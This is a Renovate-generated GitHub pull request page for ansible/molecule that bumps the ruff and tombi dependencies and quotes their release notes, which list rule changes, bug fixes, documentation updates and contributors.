[`v0.15.12`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01512)

[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.11...0.15.12)

Released on 2026-04-24.

##### Preview features

- Implement `#ruff:file-ignore` file-level suppressions
([#&#8203;23599](https://redirect.github.com/astral-sh/ruff/pull/23599))
- Implement `#ruff:ignore` logical-line suppressions
([#&#8203;23404](https://redirect.github.com/astral-sh/ruff/pull/23404))
- Revert preview changes to displayed diagnostic severity in LSP
([#&#8203;24789](https://redirect.github.com/astral-sh/ruff/pull/24789))
- \[`airflow`] Implement `task-branch-as-short-circuit` (`AIR004`)
([#&#8203;23579](https://redirect.github.com/astral-sh/ruff/pull/23579))
- \[`flake8-bugbear`] Fix `break`/`continue` handling in
`loop-iterator-mutation` (`B909`)
([#&#8203;24440](https://redirect.github.com/astral-sh/ruff/pull/24440))
- \[`pylint`] Fix `PLC2701` for type parameter scopes
([#&#8203;24576](https://redirect.github.com/astral-sh/ruff/pull/24576))

##### Rule changes

- \[`pandas-vet`] Suggest `.array` as well in `PD011`
([#&#8203;24805](https://redirect.github.com/astral-sh/ruff/pull/24805))

##### CLI

- Respect default Unix permissions for cache files
([#&#8203;24794](https://redirect.github.com/astral-sh/ruff/pull/24794))

##### Documentation

- \[`pylint`] Fix `PLR0124` description not to claim self-comparison
always returns the same value
([#&#8203;24749](https://redirect.github.com/astral-sh/ruff/pull/24749))
- \[`pyupgrade`] Expand docs on reusable `TypeVar`s and scoping
(`UP046`)
([#&#8203;24153](https://redirect.github.com/astral-sh/ruff/pull/24153))
- Improve rules table accessibility
([#&#8203;24711](https://redirect.github.com/astral-sh/ruff/pull/24711))

##### Contributors

- [@&#8203;dylwil3](https://redirect.github.com/dylwil3)
- [@&#8203;AlexWaygood](https://redirect.github.com/AlexWaygood)
- [@&#8203;woodruffw](https://redirect.github.com/woodruffw)
- [@&#8203;avasis-ai](https://redirect.github.com/avasis-ai)
- [@&#8203;Dev-iL](https://redirect.github.com/Dev-iL)
- [@&#8203;denyszhak](https://redirect.github.com/denyszhak)
- [@&#8203;ShipItAndPray](https://redirect.github.com/ShipItAndPray)
- [@&#8203;anishgirianish](https://redirect.github.com/anishgirianish)
- [@&#8203;augustelalande](https://redirect.github.com/augustelalande)
- [@&#8203;amyreese](https://redirect.github.com/amyreese)
- [@&#8203;majiayu000](https://redirect.github.com/majiayu000)

###
[`v0.15.11`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01511)

[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.10...0.15.11)

Released on 2026-04-16.

##### Preview features

- \[`ruff`] Ignore `RUF029` when function is decorated with
`asynccontextmanager`
([#&#8203;24642](https://redirect.github.com/astral-sh/ruff/pull/24642))
- \[`airflow`] Implement `airflow-xcom-pull-in-template-string`
(`AIR201`)
([#&#8203;23583](https://redirect.github.com/astral-sh/ruff/pull/23583))
- \[`flake8-bandit`] Fix `S103` false positives and negatives in mask
analysis
([#&#8203;24424](https://redirect.github.com/astral-sh/ruff/pull/24424))

##### Bug fixes

- \[`flake8-async`] Omit overridden methods for `ASYNC109`
([#&#8203;24648](https://redirect.github.com/astral-sh/ruff/pull/24648))

##### Documentation

- \[`flake8-async`] Add override mention to `ASYNC109` docs
([#&#8203;24666](https://redirect.github.com/astral-sh/ruff/pull/24666))
- Update Neovim config examples to use `vim.lsp.config`
([#&#8203;24577](https://redirect.github.com/astral-sh/ruff/pull/24577))

##### Contributors

- [@&#8203;augustelalande](https://redirect.github.com/augustelalande)
- [@&#8203;anishgirianish](https://redirect.github.com/anishgirianish)
- [@&#8203;benberryallwood](https://redirect.github.com/benberryallwood)
- [@&#8203;charliermarsh](https://redirect.github.com/charliermarsh)
- [@&#8203;Dev-iL](https://redirect.github.com/Dev-iL)

###
[`v0.15.10`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01510)

[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.9...0.15.10)

Released on 2026-04-09.

##### Preview features

- \[`flake8-logging`] Allow closures in except handlers (`LOG004`)
([#&#8203;24464](https://redirect.github.com/astral-sh/ruff/pull/24464))
- \[`flake8-self`] Make `SLF` diagnostics robust to non-self-named
variables
([#&#8203;24281](https://redirect.github.com/astral-sh/ruff/pull/24281))
- \[`flake8-simplify`] Make the fix for `collapsible-if` safe in
`preview` (`SIM102`)
([#&#8203;24371](https://redirect.github.com/astral-sh/ruff/pull/24371))

##### Bug fixes

- Avoid emitting multi-line f-string elements before Python 3.12
([#&#8203;24377](https://redirect.github.com/astral-sh/ruff/pull/24377))
- Avoid syntax error from `E502` fixes in f-strings and t-strings
([#&#8203;24410](https://redirect.github.com/astral-sh/ruff/pull/24410))
- Strip form feeds from indent passed to `dedent_to`
([#&#8203;24381](https://redirect.github.com/astral-sh/ruff/pull/24381))
- \[`pyupgrade`] Fix panic caused by handling of octals (`UP012`)
([#&#8203;24390](https://redirect.github.com/astral-sh/ruff/pull/24390))
- Reject multi-line f-string elements before Python 3.12
([#&#8203;24355](https://redirect.github.com/astral-sh/ruff/pull/24355))

##### Rule changes

- \[`ruff`] Treat f-string interpolation as potential side effect
(`RUF019`)
([#&#8203;24426](https://redirect.github.com/astral-sh/ruff/pull/24426))

##### Server

- Add support for custom file extensions
([#&#8203;24463](https://redirect.github.com/astral-sh/ruff/pull/24463))

##### Documentation

- Document adding fixes in CONTRIBUTING.md
([#&#8203;24393](https://redirect.github.com/astral-sh/ruff/pull/24393))
- Fix JSON typo in settings example
([#&#8203;24517](https://redirect.github.com/astral-sh/ruff/pull/24517))

##### Contributors

- [@&#8203;charliermarsh](https://redirect.github.com/charliermarsh)
- [@&#8203;dylwil3](https://redirect.github.com/dylwil3)
- [@&#8203;silverstein](https://redirect.github.com/silverstein)
- [@&#8203;anishgirianish](https://redirect.github.com/anishgirianish)
- [@&#8203;shizukushq](https://redirect.github.com/shizukushq)
- [@&#8203;zanieb](https://redirect.github.com/zanieb)
- [@&#8203;AlexWaygood](https://redirect.github.com/AlexWaygood)

</details>

<details>
<summary>tombi-toml/tombi (tombi)</summary>

###
[`v0.10.2`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.2)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2)

<!-- Release notes generated using configuration in .github/release.yml
at v0.10.2 -->

#### What's Changed

##### 🚀 New Features

- Add references support for Cargo and pyproject workspaces by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1821](https://redirect.github.com/tombi-toml/tombi/pull/1821)

##### 🐛 Bug Fixes

- fix(lsp): resolve type definitions for scalar bindings by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1820](https://redirect.github.com/tombi-toml/tombi/pull/1820)
- fix(vscode): allow spaced toml fences by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1816](https://redirect.github.com/tombi-toml/tombi/pull/1816)

##### 🛠️ Other Changes

- fix(pyproject): link build-system requires by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1822](https://redirect.github.com/tombi-toml/tombi/pull/1822)
- feat(vscode): add TOML configuration defaults by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1818](https://redirect.github.com/tombi-toml/tombi/pull/1818)
- Deprecate path declaration navigation in pyproject and cargo by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1823](https://redirect.github.com/tombi-toml/tombi/pull/1823)
- Improve docs tables and workspace goto navigation by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1825](https://redirect.github.com/tombi-toml/tombi/pull/1825)

**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2>

###
[`v0.10.1`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.1)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1)

<!-- Release notes generated using configuration in .github/release.yml
at v0.10.1 -->

#### What's Changed

##### 🚀 New Features

- Fix tombi config path resolution and completions by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1807](https://redirect.github.com/tombi-toml/tombi/pull/1807)

##### 🐛 Bug Fixes

- fix: keep root hover range on the current key-value by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1812](https://redirect.github.com/tombi-toml/tombi/pull/1812)
- fix(config): reject empty schema glob patterns by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1814](https://redirect.github.com/tombi-toml/tombi/pull/1814)

##### 🛠️ Other Changes

- Add schema exclude support by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1813](https://redirect.github.com/tombi-toml/tombi/pull/1813)
- docs: refine formatter intro wording by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1815](https://redirect.github.com/tombi-toml/tombi/pull/1815)

**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1>

###
[`v0.10.0`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.0)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0)

<!-- Release notes generated using configuration in .github/release.yml
at v0.10.0 -->

#### What's Changed

The file path specification in `.config/tombi.toml` has been modified to
be searched starting from its parent directory, rather than from
`.config/`.

##### 🚨 Breaking Changes

- fix: add leading comment handling for empty tables and arrays in
formatting by [@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1800](https://redirect.github.com/tombi-toml/tombi/pull/1800)
- fix: resolve project-root paths from `.config/tombi.toml` config by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1802](https://redirect.github.com/tombi-toml/tombi/pull/1802)

##### 🐛 Bug Fixes

- fix: resolve schema paths from config base dir by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1806](https://redirect.github.com/tombi-toml/tombi/pull/1806)

##### 🛠️ Other Changes

- fix: remove redundant explanation for group-blank-lines-limit and
table-blank-lines by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1799](https://redirect.github.com/tombi-toml/tombi/pull/1799)
- Strengthen README overview by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1801](https://redirect.github.com/tombi-toml/tombi/pull/1801)
- docs: correct terminology for auto sorting in documentation by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1805](https://redirect.github.com/tombi-toml/tombi/pull/1805)
- ci: cache TOMBI\_CACHE\_HOME in CI by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1804](https://redirect.github.com/tombi-toml/tombi/pull/1804)
- Add schema catalog path examples by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1803](https://redirect.github.com/tombi-toml/tombi/pull/1803)

**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0>

###
[`v0.9.26`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.9.26)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.25...v0.9.26)

<!-- Release notes generated using configuration in .github/release.yml
at v0.9.26 -->

#### What's Changed

##### 🚀 New Features

- feat: add example paths for schema in JSON and Rust definitions by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1798](https://redirect.github.com/tombi-toml/tombi/pull/1798)
- feat(formatter): add blank line spacing options by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1792](https://redirect.github.com/tombi-toml/tombi/pull/1792)

##### 🐛 Bug Fixes

- fix(vscode): enable markdown TOML fence injection by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1794](https://redirect.github.com/tombi-toml/tombi/pull/1794)
- chore: update codeblock ru

> ✂ **Note**
>
> PR body was truncated to here.

</details>

---

### Configuration

📅 **Schedule**: (in timezone UTC)

- Branch creation
  - "before 4am on monday"
- Automerge
  - Between 12:00 AM and 03:59 AM, only on Monday (`* 0-3 * * 1`)

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/ansible/molecule).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuMTU5LjIiLCJ0YXJnZXRCcmFuY2giOiJtYWluIiwibGFiZWxzIjpbImNob3JlIiwiZGVwZW5kZW5jaWVzIl19-->

---------

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Rakesh S <rakesh.s552004@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

bug

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@gaborbernat